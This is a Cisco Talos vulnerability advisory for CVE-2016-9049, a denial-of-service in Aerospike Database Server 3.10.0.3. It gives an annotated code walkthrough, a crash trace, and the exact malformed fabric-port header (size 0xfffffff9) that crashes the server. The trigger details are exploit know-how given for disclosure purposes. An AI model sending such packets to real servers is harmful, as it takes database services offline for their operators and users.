Talos Vulnerability Report

TALOS-2016-0263

Aerospike Database Server Fabric-Worker Socket-Loop Denial-of-Service Vulnerability

February 21, 2017

CVE Number

CVE-2016-9049

Summary

An exploitable denial-of-service vulnerability exists in the fabric-worker component of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server process to dereference a null pointer. An attacker only needs to connect to the fabric TCP port to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Details

The Aerospike Database Server is a distributed, scalable NoSQL database that is used as a back-end for web applications that need a key-value store. With a focus on performance, it is multi-threaded and keeps its indexes entirely in RAM, with the ability to persist data to a solid-state drive or traditional rotational media.

When receiving a packet on the fabric port (3001/TCP), the server reads data from a socket [1]. The received data is then passed as an argument to the msg_get_initial function at [2]. Inside this function, the server extracts the size and type of the packet and writes them to the variables fb->r_msg_size and fb->r_type.

as/src/fabric/fabric.c:1029
static bool
fabric_buffer_process_readable(fabric_buffer *fb)
{
...
    while (true) {
        size_t recv_full = fb->r_end - fb->r_append;
        int32_t	recv_sz = cf_socket_recv(&fb->sock, fb->r_append, recv_full, 0);            // [1]
...
        if (fb->r_msg_size == 0) {
            size_t hdr_sz = fb->r_append - fb->r_buf;
...
            if (msg_get_initial(&fb->r_msg_size, &fb->r_type, fb->r_buf, hdr_sz) != 0) {    // [2]
                cf_warning(AS_FABRIC, "fabric_buffer_process_readable() invalid msg_hdr");
                return false;
            }
...

Inside the msg_get_initial function, the server first ensures that the buffer holds at least 6 bytes, the size of a msg_hdr. The buffer is then cast to a msg_hdr structure, which contains a size and a type [1]. After converting each field from big-endian to the architecture’s native byte order [2], the server adds the header size to the size field and writes the results through the pointers passed in the function’s arguments.

cf/src/msg.c:377
int
msg_get_initial(uint32_t *size_r, msg_type *type_r, const uint8_t *buf, uint32_t buflen)
{
    if (buflen < sizeof(msg_hdr)) {
        return -1;
    }

    const msg_hdr *hdr = (const msg_hdr *)buf;                  // [1]

    *size_r = cf_swap_from_be32(hdr->size) + sizeof(msg_hdr);   // [2]
    *type_r = (msg_type)cf_swap_from_be16(hdr->type);

    return 0;
}
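
The header parsing above can be modelled in a few lines of Python. This is a minimal sketch, not Aerospike code: the names MSG_HDR and parse_msg_hdr are hypothetical, and the 6-byte layout (a big-endian 32-bit size followed by a big-endian 16-bit type) is an assumption drawn from the cf_swap_from_be32 and cf_swap_from_be16 calls and the 6-byte minimum. The sum is truncated to 32 bits because the C code stores it through a uint32_t pointer.

```python
import struct

# Assumed layout of msg_hdr: big-endian uint32 size, then big-endian uint16 type.
MSG_HDR = struct.Struct(">IH")  # 6 bytes, no padding


def parse_msg_hdr(buf: bytes):
    """Model of msg_get_initial(): return (total_size, msg_type) or None."""
    if len(buf) < MSG_HDR.size:
        return None  # mirrors the `return -1` path for a short buffer
    size, msg_type = MSG_HDR.unpack_from(buf, 0)
    # The C code stores the sum through a uint32_t pointer, so keep 32 bits.
    total_size = (size + MSG_HDR.size) & 0xFFFFFFFF
    return total_size, msg_type


# A header announcing a 16-byte body of type 0.
print(parse_msg_hdr(bytes.fromhex("000000100000")))  # (22, 0)
```

Note that the returned size already includes the 6 header bytes, so it is this total, not the raw size field, that the caller compares and allocates.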

Upon returning to the fabric_buffer_process_readable function, the server checks whether the resulting size is larger than 0x100000 (FB_BUF_MEM_SZ) [1] and, if so, uses that size in an allocation [2]. The result of the call to cf_malloc is never checked, so an attacker who supplies a size large enough to make the allocation fail causes the memcpy that follows to write to a NULL pointer [3] before the rest of the packet is read.

as/src/fabric/fabric.c:243
#define FB_BUF_MEM_SZ		(1024 * 1024)

as/src/fabric/fabric.c:1029
static bool
fabric_buffer_process_readable(fabric_buffer *fb)
{
...
    while (true) {
        size_t recv_full = fb->r_end - fb->r_append;
        int32_t	recv_sz = cf_socket_recv(&fb->sock, fb->r_append, recv_full, 0);
...
        if (fb->r_msg_size == 0) {
            size_t hdr_sz = fb->r_append - fb->r_buf;
...
            if (msg_get_initial(&fb->r_msg_size, &fb->r_type, fb->r_buf, hdr_sz) != 0) {
                cf_warning(AS_FABRIC, "fabric_buffer_process_readable() invalid msg_hdr");
                return false;
            }

            if (fb->r_msg_size > FB_BUF_MEM_SZ) {           // [1] 1024*1024
                fb->r_buf = cf_malloc(fb->r_msg_size);      // [2]
                fb->r_append = fb->r_buf + hdr_sz;
                memcpy(fb->r_buf, fb->membuf, hdr_sz);      // [3]
            }
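
The control flow above, together with the check that is missing at [2], can be modelled as follows. This is a Python sketch under stated assumptions rather than the vendor's fix: choose_receive_buffer, limited_alloc and the alloc callback are hypothetical names, and alloc returning None stands in for cf_malloc returning NULL.

```python
FB_BUF_MEM_SZ = 1024 * 1024  # same threshold as the #define in fabric.c


def choose_receive_buffer(msg_size, membuf, hdr_sz, alloc):
    """Model of the large-message branch with the allocation result checked.

    `alloc(n)` is a hypothetical allocator that returns a bytearray of n
    bytes, or None on failure (standing in for cf_malloc returning NULL).
    Returns the buffer to keep reading into, or None to drop the connection.
    """
    if msg_size <= FB_BUF_MEM_SZ:
        return membuf  # message fits in the embedded buffer
    buf = alloc(msg_size)
    if buf is None:
        return None  # the check missing at [2]: reject instead of copying
    buf[:hdr_sz] = membuf[:hdr_sz]  # corresponds to the memcpy at [3]
    return buf


def limited_alloc(n, limit=16 * 1024 * 1024):
    """Toy allocator that fails for requests above `limit` bytes."""
    return bytearray(n) if n <= limit else None


membuf = bytearray(b"\xff\xff\xff\xf9\x00\x00")
print(choose_receive_buffer(0xFFFFFFFF, membuf, 6, limited_alloc))  # None
```

In this model a failed allocation is reported to the caller, which can then close the connection, instead of being passed on to the copy.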

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`

...
(gdb) c
Continuing.

[Switching to Thread 0x7f681e79a700 (LWP 27061)]

Catchpoint 4 (signal SIGSEGV), 0x00007f68999578b6 in __memcpy_ssse3_back ()
   from /lib64/libc.so.6

(gdb) x/i $pc
=> 0x7f68999578b6 <__memcpy_ssse3_back+8518>:   mov    %edx,-0x6(%rdi)
(gdb) i r $rdi
rdi            0x6      0x6

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3001
Trying to connect to hostname:3001
Sending 0x6 byte header... done.
Keeping connection open for just a couple seconds.....done.
Checking if host is dead... yes.

The proof-of-concept sends a header encoded in big-endian form with the following structure. To trigger this vulnerability, an attacker only needs to specify a 32-bit size that is larger than 0x100000 and large enough to cause the target server’s allocator to fail. The server adds the size of a msg_hdr (6) to this value and then uses the result in an allocation.

<class aspie.msg_hdr_s> 'header'
[0] <instance uint32_t 'size'> +0xfffffff9 (4294967289)
[4] <instance aspie.M_TYPE 'type'> FABRIC(0x0)
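
The size arithmetic for this header can be checked by hand. The sketch below only repeats the server-side addition in Python; HDR_SZ and alloc_request are hypothetical names, and the 32-bit truncation is an assumption based on the uint32_t pointer in the msg_get_initial signature.

```python
HDR_SZ = 6                   # size of msg_hdr as stated in the report
FB_BUF_MEM_SZ = 1024 * 1024  # 0x100000, the large-message threshold


def alloc_request(size_field):
    """Size the server would request: size + sizeof(msg_hdr), kept to 32 bits."""
    return (size_field + HDR_SZ) & 0xFFFFFFFF


request = alloc_request(0xFFFFFFF9)
print(hex(request))             # 0xffffffff
print(request > FB_BUF_MEM_SZ)  # True: the large-message branch is taken

# One step higher and the 32-bit sum wraps around in this model.
print(alloc_request(0xFFFFFFFA))  # 0
```

Under these assumptions, 0xfffffff9 is the largest size field whose sum does not wrap, which yields a request of one byte short of 4 GiB.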

Mitigation

It is recommended to use technology such as a firewall to deny illegitimate users access to the ports required by the server for clustering.

Timeline

2016-12-23 - Vendor Disclosure
2017-02-21 - Public Release

Credit

Discovered by the Cisco Talos Team.